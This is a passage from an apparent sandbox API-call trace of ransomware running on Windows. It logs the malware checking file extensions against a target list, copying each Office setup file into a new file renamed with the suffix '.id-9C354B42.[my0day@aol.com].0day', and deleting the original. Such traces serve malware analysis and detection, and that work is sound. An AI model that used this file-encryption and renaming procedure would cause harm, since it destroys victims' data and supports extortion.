returned 1 [0039.056] lstrlenW (lpString=".xls") returned 4 [0039.056] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0039.056] lstrlenW (lpString=".xlsx") returned 5 [0039.056] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1 [0039.056] lstrlenW (lpString=".ppt") returned 4 [0039.056] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0039.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.056] lstrlenW (lpString=".zip") returned 4 [0039.056] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0039.056] lstrlenW (lpString=".rar") returned 4 [0039.056] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0039.056] lstrlenW (lpString=".bz2") returned 4 [0039.056] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0039.056] lstrlenW (lpString=".7z") returned 3 [0039.056] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0039.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.056] lstrlenW (lpString=".dbf") returned 4 [0039.056] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0039.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.056] lstrlenW (lpString=".1cd") returned 4 [0039.056] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0039.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.056] lstrlenW (lpString=".jpg") returned 4 [0039.056] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0039.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.057] lstrlenW (lpString=".doc") returned 4 [0039.057] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0039.057] lstrlenW (lpString=".docx") returned 5 [0039.057] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1 [0039.057] lstrlenW (lpString=".pdf") returned 4 [0039.057] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0039.057] lstrlenW (lpString=".xls") returned 4 [0039.057] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0039.057] lstrlenW (lpString=".xlsx") returned 5 [0039.057] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1 [0039.057] lstrlenW (lpString=".ppt") returned 4 [0039.057] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0039.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.057] lstrlenW (lpString=".zip") returned 4 [0039.057] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0039.057] lstrlenW (lpString=".rar") returned 4 [0039.057] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0039.057] lstrlenW (lpString=".bz2") returned 4 [0039.057] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0039.057] lstrlenW (lpString=".7z") returned 3 [0039.057] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0039.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.057] lstrlenW (lpString=".dbf") returned 4 [0039.057] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0039.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.057] lstrlenW (lpString=".1cd") returned 4 [0039.057] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0039.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0039.057] lstrlenW (lpString=".jpg") returned 4 [0039.057] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0039.057] lstrcmpiW (lpString1=".CHM", lpString2=".0day") returned 1 [0039.058] lstrlenW (lpString="PSS10R.CHM") returned 10 [0039.058] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.527] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=27195) returned 1 [0039.527] CloseHandle (hObject=0x1b0) returned 1 [0039.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 0x20 [0039.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.527] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.527] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0039.528] GetLastError () returned 0x0 [0039.528] ReadFile (in: hFile=0x1b0, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x6a3b, lpOverlapped=0x0) returned 1 [0039.556] WriteFile (in: hFile=0x170, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x6a40, lpOverlapped=0x0) returned 1 [0039.557] ReadFile (in: hFile=0x1b0, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0039.557] WriteFile (in: hFile=0x170, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0039.557] SetEndOfFile (hFile=0x170) returned 1 [0039.557] CloseHandle (hObject=0x170) returned 1 [0039.558] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.558] SetEndOfFile (hFile=0x1b0) returned 1 [0039.559] CloseHandle (hObject=0x1b0) returned 1 [0039.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0039.559] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 1 [0039.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.560] lstrlenW (lpString=".doc") returned 4 [0039.560] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0039.560] lstrlenW (lpString=".docx") returned 5 [0039.560] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1 [0039.560] lstrlenW (lpString=".pdf") returned 4 [0039.560] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0039.560] lstrlenW (lpString=".xls") returned 4 [0039.560] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0039.560] lstrlenW (lpString=".xlsx") returned 5 [0039.560] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1 [0039.560] lstrlenW (lpString=".ppt") returned 4 [0039.560] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0039.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.560] lstrlenW (lpString=".zip") returned 4 [0039.560] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0039.560] lstrlenW (lpString=".rar") returned 4 [0039.560] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0039.560] lstrlenW (lpString=".bz2") returned 4 [0039.560] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0039.560] lstrlenW (lpString=".7z") returned 3 [0039.560] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0039.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.560] lstrlenW (lpString=".dbf") returned 4 [0039.560] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0039.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.560] lstrlenW (lpString=".1cd") returned 4 [0039.560] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0039.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.561] lstrlenW (lpString=".jpg") returned 4 [0039.561] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0039.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.561] lstrlenW (lpString=".doc") returned 4 [0039.561] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0039.561] lstrlenW (lpString=".docx") returned 5 [0039.561] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1 [0039.561] lstrlenW (lpString=".pdf") returned 4 [0039.561] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0039.561] lstrlenW (lpString=".xls") returned 4 [0039.561] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0039.561] lstrlenW (lpString=".xlsx") returned 5 [0039.561] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1 [0039.561] lstrlenW (lpString=".ppt") returned 4 [0039.561] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0039.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.561] lstrlenW (lpString=".zip") returned 4 [0039.561] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0039.561] lstrlenW (lpString=".rar") returned 4 [0039.561] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0039.561] lstrlenW (lpString=".bz2") returned 4 [0039.561] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0039.561] lstrlenW (lpString=".7z") returned 3 [0039.561] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0039.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.561] lstrlenW (lpString=".dbf") returned 4 [0039.561] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0039.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.561] lstrlenW (lpString=".1cd") returned 4 [0039.561] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0039.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0039.561] lstrlenW (lpString=".jpg") returned 4 [0039.562] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0039.562] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0039.562] lstrlenW (lpString="Office32MUI.XML") returned 15 [0039.562] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.069] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1383) returned 1 [0040.069] CloseHandle (hObject=0x1c4) returned 1 [0040.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 0x20 [0040.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.069] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.069] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.069] GetLastError () returned 0x0 [0040.069] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x567, lpOverlapped=0x0) returned 1 [0040.071] WriteFile (in: hFile=0x1b0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x570, lpOverlapped=0x0) returned 1 [0040.072] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.072] WriteFile (in: hFile=0x1b0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xf2, lpOverlapped=0x0) returned 1 [0040.072] SetEndOfFile (hFile=0x1b0) returned 1 [0040.072] CloseHandle (hObject=0x1b0) returned 1 [0040.073] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.073] SetEndOfFile (hFile=0x1c4) returned 1 [0040.073] CloseHandle (hObject=0x1c4) returned 1 [0040.073] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.074] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 1 [0040.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.074] lstrlenW (lpString=".doc") returned 4 [0040.074] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.074] lstrlenW (lpString=".docx") returned 5 [0040.074] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.074] lstrlenW (lpString=".pdf") returned 4 [0040.074] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.074] lstrlenW (lpString=".xls") returned 4 [0040.074] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.074] lstrlenW (lpString=".xlsx") returned 5 [0040.074] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.074] lstrlenW (lpString=".ppt") returned 4 [0040.074] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.074] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.074] lstrlenW (lpString=".zip") returned 4 [0040.074] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.074] lstrlenW (lpString=".rar") returned 4 [0040.074] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.074] lstrlenW (lpString=".bz2") returned 4 [0040.074] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.074] lstrlenW (lpString=".7z") returned 3 [0040.074] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.075] lstrlenW (lpString=".dbf") returned 4 [0040.075] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.075] lstrlenW (lpString=".1cd") returned 4 [0040.075] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.075] lstrlenW (lpString=".jpg") returned 4 [0040.075] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.075] lstrlenW (lpString=".doc") returned 4 [0040.075] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.075] lstrlenW (lpString=".docx") returned 5 [0040.075] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.075] lstrlenW (lpString=".pdf") returned 4 [0040.075] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.075] lstrlenW (lpString=".xls") returned 4 [0040.075] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.075] lstrlenW (lpString=".xlsx") returned 5 [0040.075] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.075] lstrlenW (lpString=".ppt") returned 4 [0040.075] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.076] lstrlenW (lpString=".zip") returned 4 [0040.076] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.076] lstrlenW (lpString=".rar") returned 4 [0040.076] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.076] lstrlenW (lpString=".bz2") returned 4 [0040.076] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.076] lstrlenW (lpString=".7z") returned 3 [0040.076] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.076] lstrlenW (lpString=".dbf") returned 4 [0040.076] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.076] lstrlenW (lpString=".1cd") returned 4 [0040.076] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.076] lstrlenW (lpString=".jpg") returned 4 [0040.076] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.076] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.076] lstrlenW (lpString="OutlookMUI.XML") returned 14 [0040.076] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.076] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=3186) returned 1 [0040.077] CloseHandle (hObject=0x1c4) returned 1 [0040.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 0x20 [0040.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.077] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.077] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.077] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.077] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.079] GetLastError () returned 0x0 [0040.079] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xc72, lpOverlapped=0x0) returned 1 [0040.080] WriteFile (in: hFile=0x1b0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xc80, lpOverlapped=0x0) returned 1 [0040.081] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.081] WriteFile (in: hFile=0x1b0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.081] SetEndOfFile (hFile=0x1b0) returned 1 [0040.081] CloseHandle (hObject=0x1b0) returned 1 [0040.082] 